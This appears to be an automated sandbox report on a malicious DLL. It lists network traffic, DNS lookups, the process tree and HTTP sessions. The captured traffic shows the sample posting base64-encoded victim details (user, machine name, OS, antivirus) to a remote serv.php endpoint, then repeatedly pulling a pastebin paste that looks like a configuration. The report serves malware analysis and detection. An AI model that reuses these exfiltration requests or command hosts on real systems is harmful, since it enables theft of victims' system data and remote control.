Dec 4, 2022 22:28:20.637028933 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.651937962 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.667117119 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.678930044 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.693097115 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:20.714397907 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.579235077 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.584759951 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:25.590564013 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.592194080 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:25.604134083 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.604873896 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:25.612883091 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.613368034 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:25.621367931 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.621857882 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:25.635809898 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.637871027 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:25.649156094 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.653865099 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:25.668791056 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.670777082 CET	49729	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:25.726967096 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.734572887 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.755867958 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.757509947 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.766232014 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.781759024 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.797764063 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:25.814966917 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:30.680212975 CET	2000	49708	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:30.693924904 CET	2000	49709	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:30.703696012 CET	2000	49711	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:30.713514090 CET	2000	49723	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:30.722382069 CET	2000	49725	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:30.725764990 CET	49708	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:30.734493017 CET	2000	49727	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:30.737092018 CET	49709	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:30.743896008 CET	49711	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:30.749481916 CET	2000	49728	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:30.753397942 CET	49723	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:30.758471966 CET	2000	49729	86.48.24.91	192.168.2.3
Dec 4, 2022 22:28:30.762763023 CET	49725	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:30.775930882 CET	49727	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:30.793037891 CET	49728	2000	192.168.2.3	86.48.24.91
Dec 4, 2022 22:28:30.801476002 CET	49729	2000	192.168.2.3	86.48.24.91

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2022 22:24:29.515820980 CET	57840	53	192.168.2.3	8.8.8.8
Dec 4, 2022 22:24:29.557092905 CET	53	57840	8.8.8.8	192.168.2.3
Dec 4, 2022 22:24:30.445106030 CET	57990	53	192.168.2.3	8.8.8.8
Dec 4, 2022 22:24:30.467135906 CET	53	57990	8.8.8.8	192.168.2.3
Dec 4, 2022 22:24:30.934822083 CET	52387	53	192.168.2.3	8.8.8.8
Dec 4, 2022 22:24:30.956899881 CET	53	52387	8.8.8.8	192.168.2.3
Dec 4, 2022 22:24:34.722403049 CET	56924	53	192.168.2.3	8.8.8.8
Dec 4, 2022 22:24:34.741597891 CET	53	56924	8.8.8.8	192.168.2.3
Dec 4, 2022 22:25:05.461997986 CET	53975	53	192.168.2.3	8.8.8.8
Dec 4, 2022 22:25:05.481703043 CET	53	53975	8.8.8.8	192.168.2.3
Dec 4, 2022 22:25:06.750123978 CET	51139	53	192.168.2.3	8.8.8.8
Dec 4, 2022 22:25:06.772469044 CET	53	51139	8.8.8.8	192.168.2.3
Dec 4, 2022 22:25:07.594399929 CET	52955	53	192.168.2.3	8.8.8.8
Dec 4, 2022 22:25:07.613972902 CET	53	52955	8.8.8.8	192.168.2.3
Dec 4, 2022 22:25:08.147825003 CET	60582	53	192.168.2.3	8.8.8.8
Dec 4, 2022 22:25:08.169115067 CET	53	60582	8.8.8.8	192.168.2.3
Dec 4, 2022 22:25:09.374255896 CET	57134	53	192.168.2.3	8.8.8.8
Dec 4, 2022 22:25:09.393791914 CET	53	57134	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 4, 2022 22:24:29.515820980 CET	192.168.2.3	8.8.8.8	0x2d37	Standard query (0)	a0747694.xsph.ru	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:24:30.445106030 CET	192.168.2.3	8.8.8.8	0x2ca7	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:24:30.934822083 CET	192.168.2.3	8.8.8.8	0x89e6	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:24:34.722403049 CET	192.168.2.3	8.8.8.8	0x15cf	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:05.461997986 CET	192.168.2.3	8.8.8.8	0x9252	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:06.750123978 CET	192.168.2.3	8.8.8.8	0x56c1	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:07.594399929 CET	192.168.2.3	8.8.8.8	0xc120	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:08.147825003 CET	192.168.2.3	8.8.8.8	0x9036	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:09.374255896 CET	192.168.2.3	8.8.8.8	0xbdd5	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 4, 2022 22:24:29.557092905 CET	8.8.8.8	192.168.2.3	0x2d37	No error (0)	a0747694.xsph.ru	141.8.197.42	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:24:30.467135906 CET	8.8.8.8	192.168.2.3	0x2ca7	No error (0)	pastebin.com	172.67.34.170	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:24:30.467135906 CET	8.8.8.8	192.168.2.3	0x2ca7	No error (0)	pastebin.com	104.20.67.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:24:30.467135906 CET	8.8.8.8	192.168.2.3	0x2ca7	No error (0)	pastebin.com	104.20.68.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:24:30.956899881 CET	8.8.8.8	192.168.2.3	0x89e6	No error (0)	pastebin.com	172.67.34.170	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:24:30.956899881 CET	8.8.8.8	192.168.2.3	0x89e6	No error (0)	pastebin.com	104.20.68.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:24:30.956899881 CET	8.8.8.8	192.168.2.3	0x89e6	No error (0)	pastebin.com	104.20.67.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:24:34.741597891 CET	8.8.8.8	192.168.2.3	0x15cf	No error (0)	pastebin.com	172.67.34.170	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:24:34.741597891 CET	8.8.8.8	192.168.2.3	0x15cf	No error (0)	pastebin.com	104.20.67.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:24:34.741597891 CET	8.8.8.8	192.168.2.3	0x15cf	No error (0)	pastebin.com	104.20.68.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:05.481703043 CET	8.8.8.8	192.168.2.3	0x9252	No error (0)	pastebin.com	104.20.68.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:05.481703043 CET	8.8.8.8	192.168.2.3	0x9252	No error (0)	pastebin.com	172.67.34.170	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:05.481703043 CET	8.8.8.8	192.168.2.3	0x9252	No error (0)	pastebin.com	104.20.67.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:06.772469044 CET	8.8.8.8	192.168.2.3	0x56c1	No error (0)	pastebin.com	104.20.67.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:06.772469044 CET	8.8.8.8	192.168.2.3	0x56c1	No error (0)	pastebin.com	104.20.68.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:06.772469044 CET	8.8.8.8	192.168.2.3	0x56c1	No error (0)	pastebin.com	172.67.34.170	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:07.613972902 CET	8.8.8.8	192.168.2.3	0xc120	No error (0)	pastebin.com	172.67.34.170	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:07.613972902 CET	8.8.8.8	192.168.2.3	0xc120	No error (0)	pastebin.com	104.20.67.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:07.613972902 CET	8.8.8.8	192.168.2.3	0xc120	No error (0)	pastebin.com	104.20.68.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:08.169115067 CET	8.8.8.8	192.168.2.3	0x9036	No error (0)	pastebin.com	172.67.34.170	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:08.169115067 CET	8.8.8.8	192.168.2.3	0x9036	No error (0)	pastebin.com	104.20.67.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:08.169115067 CET	8.8.8.8	192.168.2.3	0x9036	No error (0)	pastebin.com	104.20.68.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:09.393791914 CET	8.8.8.8	192.168.2.3	0xbdd5	No error (0)	pastebin.com	104.20.68.143	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:09.393791914 CET	8.8.8.8	192.168.2.3	0xbdd5	No error (0)	pastebin.com	172.67.34.170	A (IP address)	IN (0x0001)	false
Dec 4, 2022 22:25:09.393791914 CET	8.8.8.8	192.168.2.3	0xbdd5	No error (0)	pastebin.com	104.20.67.143	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

a0747694.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49707	172.67.34.170	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49706	172.67.34.170	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49710	172.67.34.170	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49720	104.20.68.143	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49721	104.20.67.143	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49722	172.67.34.170	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49724	172.67.34.170	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49726	104.20.68.143	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49705	141.8.197.42	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Dec 4, 2022 22:24:29.608438969 CET	104	OUT	POST /serv.php HTTP/1.0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 153 Host: a0747694.xsph.ru Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/3.0 (compatible; Indy Library)
Dec 4, 2022 22:24:29.657469034 CET	105	OUT	Data Raw: 76 76 3d 31 30 26 76 77 3d 26 6d 6f 64 73 3d 26 75 6e 61 6d 65 3d 61 47 46 79 5a 48 6f 26 63 6e 61 6d 65 3d 4d 54 49 34 4e 7a 55 33 26 6f 73 3d 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 46 64 70 62 6d 52 76 64 33 4d 67 4d 54 41 67 55 48 4a 76 49 44 Data Ascii: vv=10&vw=&mods=&uname=aGFyZHo&cname=MTI4NzU3&os=TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvIDY0LWJpdA&is=YWFhYSwgYWFhYSwgYWFh&iss=YWFhYWE&iav=V2luZG93cyBEZWZlbmRlcg
Dec 4, 2022 22:24:29.707089901 CET	105	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 04 Dec 2022 21:24:29 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49707	172.67.34.170	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-04 21:24:31 UTC	0	OUT	GET /raw/kk8ua858 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2022-12-04 21:24:32 UTC	0	IN	HTTP/1.1 200 OK Date: Sun, 04 Dec 2022 21:24:32 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Sun, 04 Dec 2022 21:24:32 GMT Server: cloudflare CF-RAY: 77479c006d489199-FRA
2022-12-04 21:24:32 UTC	1	IN	Data Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
2022-12-04 21:24:32 UTC	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49706	172.67.34.170	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Direction	Data
2022-12-04 21:24:31 UTC	OUT	GET /raw/kk8ua858 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2022-12-04 21:24:32 UTC	IN	HTTP/1.1 200 OK Date: Sun, 04 Dec 2022 21:24:32 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Sun, 04 Dec 2022 21:24:32 GMT Server: cloudflare CF-RAY: 77479c03c957bb9e-FRA
2022-12-04 21:24:32 UTC	IN	Data Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
2022-12-04 21:24:32 UTC	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49710	172.67.34.170	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-04 21:24:45 UTC	1	OUT	GET /raw/kk8ua858 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2022-12-04 21:24:45 UTC	1	IN	HTTP/1.1 200 OK Date: Sun, 04 Dec 2022 21:24:45 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 13 Last-Modified: Sun, 04 Dec 2022 21:24:32 GMT Server: cloudflare CF-RAY: 77479c570d9b9b88-FRA
2022-12-04 21:24:45 UTC	1	IN	Data Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
2022-12-04 21:24:45 UTC	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49720	104.20.68.143	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-04 21:25:06 UTC	1	OUT	GET /raw/kk8ua858 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2022-12-04 21:25:06 UTC	2	IN	HTTP/1.1 200 OK Date: Sun, 04 Dec 2022 21:25:06 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Sun, 04 Dec 2022 21:25:06 GMT Server: cloudflare CF-RAY: 77479cdc2ea2bb3b-FRA
2022-12-04 21:25:06 UTC	2	IN	Data Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
2022-12-04 21:25:06 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49721	104.20.67.143	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-04 21:25:08 UTC	2	OUT	GET /raw/kk8ua858 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2022-12-04 21:25:08 UTC	2	IN	HTTP/1.1 200 OK Date: Sun, 04 Dec 2022 21:25:08 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Sun, 04 Dec 2022 21:25:08 GMT Server: cloudflare CF-RAY: 77479ce539929975-FRA
2022-12-04 21:25:08 UTC	3	IN	Data Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
2022-12-04 21:25:08 UTC	3	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49722	172.67.34.170	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-04 21:25:10 UTC	3	OUT	GET /raw/kk8ua858 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2022-12-04 21:25:10 UTC	3	IN	HTTP/1.1 200 OK Date: Sun, 04 Dec 2022 21:25:10 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 38 Last-Modified: Sun, 04 Dec 2022 21:24:32 GMT Server: cloudflare CF-RAY: 77479cf4e9d59159-FRA
2022-12-04 21:25:10 UTC	3	IN	Data Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
2022-12-04 21:25:10 UTC	3	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49724	172.67.34.170	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-04 21:25:11 UTC	3	OUT	GET /raw/kk8ua858 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2022-12-04 21:25:11 UTC	3	IN	HTTP/1.1 200 OK Date: Sun, 04 Dec 2022 21:25:11 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 5 Last-Modified: Sun, 04 Dec 2022 21:25:06 GMT Server: cloudflare CF-RAY: 77479cf83f18bb65-FRA
2022-12-04 21:25:11 UTC	4	IN	Data Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
2022-12-04 21:25:11 UTC	4	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49726	104.20.68.143	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2022-12-04 21:25:12 UTC	4	OUT	GET /raw/kk8ua858 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2022-12-04 21:25:12 UTC	4	IN	HTTP/1.1 200 OK Date: Sun, 04 Dec 2022 21:25:12 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 40 Last-Modified: Sun, 04 Dec 2022 21:24:32 GMT Server: cloudflare CF-RAY: 77479d01389b90dd-FRA
2022-12-04 21:25:12 UTC	4	IN	Data Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
2022-12-04 21:25:12 UTC	4	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	22:24:04
Start date:	04/12/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\htmlayout.dll"
Imagebase:	0xaa0000
File size:	116736 bytes
MD5 hash:	1F562FBF37040EC6C43C8D5EF619EA39
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	moderate

Target ID:	1
Start time:	22:24:04
Start date:	04/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	2
Start time:	22:24:04
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	3
Start time:	22:24:04
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAnimateElement
Imagebase:	0x1350000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high

Target ID:	4
Start time:	22:24:04
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1
Imagebase:	0x1350000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high

Target ID:	5
Start time:	22:24:09
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAppendMasterCSS
Imagebase:	0x1350000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
